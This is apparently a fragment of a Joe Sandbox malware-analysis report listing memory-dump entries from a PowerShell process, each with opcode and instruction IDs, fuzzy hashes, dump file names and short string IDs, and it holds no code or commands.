                                                                              • Opcode ID: b6e8dfee2fc4eff88f8da0e1b2d9ea50daf0650cb3e98582cfc7bd97d8a5460c
                                                                              • Instruction ID: f7e67dafa95a3956edf2749365af99bf239251add118d0f658bfbea2af9aaae2
                                                                              • Opcode Fuzzy Hash: b6e8dfee2fc4eff88f8da0e1b2d9ea50daf0650cb3e98582cfc7bd97d8a5460c
                                                                              • Instruction Fuzzy Hash: 4501D4710083809EE710CA6EDD84767FFE8EF41368F0CC87DEC089A256D2799841C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1818959887.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_35cd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed92e60db4ae291fdf1ba1c366bf561aac9612a81fefb11977ac0e06eec85f8c
                                                                              • Instruction ID: 6dab5926608dc193346d2edfbdfded8edc42f0faf86306b22eeafff729aeba7e
                                                                              • Opcode Fuzzy Hash: ed92e60db4ae291fdf1ba1c366bf561aac9612a81fefb11977ac0e06eec85f8c
                                                                              • Instruction Fuzzy Hash: BD012D6100E3C09ED7128B259C94B56BFB4EF43224F1DC4DBD8889F2A7D2699848C772
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 84802ffdb715a1e42a17e7c9091e8bfa895195b8e66e5c492db2da29e8fbec8d
                                                                              • Instruction ID: 075e94c8bab9cb7cf6b7ffd77a971e86a1d652a4503981e67bd1cab8ee8fc509
                                                                              • Opcode Fuzzy Hash: 84802ffdb715a1e42a17e7c9091e8bfa895195b8e66e5c492db2da29e8fbec8d
                                                                              • Instruction Fuzzy Hash: 6CF0DA35A001099FCB15CF9DD990AEEF7B1FF88328F208159E515A72A1C736AC52CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-578306960
                                                                              • Opcode ID: f3b474629541e6f4f7373617166d8a7457fe96d689d0cf473fada94f3fae17a6
                                                                              • Instruction ID: 84b44f2eb748444c1c71a581a73da57d581f8d000b50fc80012c41623e04929c
                                                                              • Opcode Fuzzy Hash: f3b474629541e6f4f7373617166d8a7457fe96d689d0cf473fada94f3fae17a6
                                                                              • Instruction Fuzzy Hash: AE416CB67043068FDB145B28A810A76FBE5EFC6720F24807AE585CF362CA32CC44C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: ab8502c3319e51dfcdca1d3047745725805750e26f68d11e2f50bd54d9d64be7
                                                                              • Instruction ID: c1c8b547ee6de78c377cb5608e4d35bf79df49a5da6ee43f221d39327549ab20
                                                                              • Opcode Fuzzy Hash: ab8502c3319e51dfcdca1d3047745725805750e26f68d11e2f50bd54d9d64be7
                                                                              • Instruction Fuzzy Hash: 5581F3B570020ADFDB249AA8D840A6AFBE6BF85214B14C47AD849CB355DE33DD46C7A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: fa7154ea82c7e895f0341bcdb95dbd78f0866a1e50a2bd0ee5cc21611498c9b5
                                                                              • Instruction ID: d08e3a42933a23a43121099861eb54915d6afc583a26063ca8ea543317aba4db
                                                                              • Opcode Fuzzy Hash: fa7154ea82c7e895f0341bcdb95dbd78f0866a1e50a2bd0ee5cc21611498c9b5
                                                                              • Instruction Fuzzy Hash: ED2136B170030AABDF38896ADC04B3BEBDA9BD5B14F64853AA549CF385DD36CC458361
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 1f1e5bb86e1628f5ff5e2c1a0d35997e0d53251ab2dc32c3ab9d02d0bf0e0920
                                                                              • Instruction ID: 4482c15dceee5a44ac7833a5e012a1d7d47f652c4e7d397ee6737edaf74354ca
                                                                              • Opcode Fuzzy Hash: 1f1e5bb86e1628f5ff5e2c1a0d35997e0d53251ab2dc32c3ab9d02d0bf0e0920
                                                                              • Instruction Fuzzy Hash: 55014961B4938A0FC72A02283C30626AFB66FC355072940FBC185EF3ABCD158C49C3E6